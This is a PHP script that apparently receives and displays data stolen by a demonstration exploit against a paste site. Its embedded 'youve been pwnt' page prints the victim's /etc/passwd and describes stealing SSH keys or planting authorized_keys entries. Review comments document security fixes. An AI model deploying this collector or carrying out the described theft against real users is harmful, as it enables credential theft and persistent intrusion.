<?php
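// Receiver for the paste proof-of-concept. Two request shapes are handled:
//   ?d=<base64>  decodes the payload, stores it under $pwnpath and prints a
//                link to it;
//   ?id=<id>     renders the stored payload inside the explanatory page below.
// Both parameters arrive from arbitrary clients and are treated as untrusted.
$pwnpath = '/home/anton/paste/pwns/';

// Explanatory page shown around a stored payload (emitted verbatim).
// NOTE(review): the text says a "private key" would be added to
// ~/.ssh/authorized_keys; that file holds public keys. Wording left as the
// author wrote it.
$lecture = <<<EOF
<!doctype html>
<html>
<head>
<title>pwnt</title>
</head>
<body>
    <h2>youve been pwnt</h2>
    <hr>
    <p>
    I just stole your /etc/passwd. That isn't too bad, its just a list of users on your machine.. But I could just as easily have taken your <strong>SSH private key</strong>, <strong>SSL keys/certs</strong>, and <strong>any other data your account can read</strong>.
    </p>
    <p>
    <strong>Or...</strong> I could have <em>written</em> data instead. Such as adding a new private key to your ~/.ssh/authorized_keys file, so that I could <strong>sneak in later and wreak havoc</strong>. In fact, are you sure I didn't? ;)
    </p>
    <p>
    To see how that exploit was pulled off, read the source of <a href="http://antsar.rutgers.edu/paste">antsar.rutgers.edu/paste</a>
    <hr>
    <p>
    Here's your /etc/passwd file, for proof:
    </p>
    <pre>
EOF;

// Closes the <pre> block and the document opened by $lecture.
$htmlfoot = <<<EOF
    </pre>
</body>
</html>
EOF;

if (isset($_GET['d'])) {
    $raw = $_GET['d'];
    // ?d[]=... arrives as an array; strict decoding rejects input that is not
    // base64 instead of silently dropping the offending characters.
    $dec = is_string($raw) ? base64_decode($raw, true) : false;
    if ($dec === false || $dec === '') {
        echo "oops, nevermind";
    } else {
        // uniqid() is derived from the clock, so ids were guessable and every
        // stored dump could be enumerated. Use a CSPRNG-backed id instead; hex
        // output still satisfies the id check in the ?id= branch.
        $id = bin2hex(random_bytes(16));
        if (file_put_contents($pwnpath.$id, $dec, LOCK_EX) === false) {
            // Do not hand out a link to a file that was never written.
            http_response_code(500);
            echo "oops, nevermind";
        } else {
            echo "http://antsar.rutgers.edu/paste/p.php?id={$id}";
        }
    }
} elseif (isset($_GET['id'])) {
    $id = $_GET['id'];
    // Allow-list the id: non-empty, letters/digits/underscore/hyphen only.
    // This keeps path separators and dots out of the file name, and rejects
    // the empty id that would otherwise resolve to the directory itself.
    if (!is_string($id) || preg_match('/\A[a-z0-9_\-]+\z/i', $id) !== 1) {
        die('invalid id');
    }

    $file = $pwnpath.$id;
    $data = is_file($file) ? file_get_contents($file) : false;
    if ($data === false) {
        die('invalid id');
    }

    header('Content-Type: text/html; charset=UTF-8');
    echo $lecture;
    // The stored bytes were supplied by whoever called ?d=, so they are
    // HTML-escaped before being placed inside <pre>; echoing them raw let any
    // submitter run script in the viewer's browser (stored XSS).
    echo htmlspecialchars($data, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    echo $htmlfoot;
}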

?>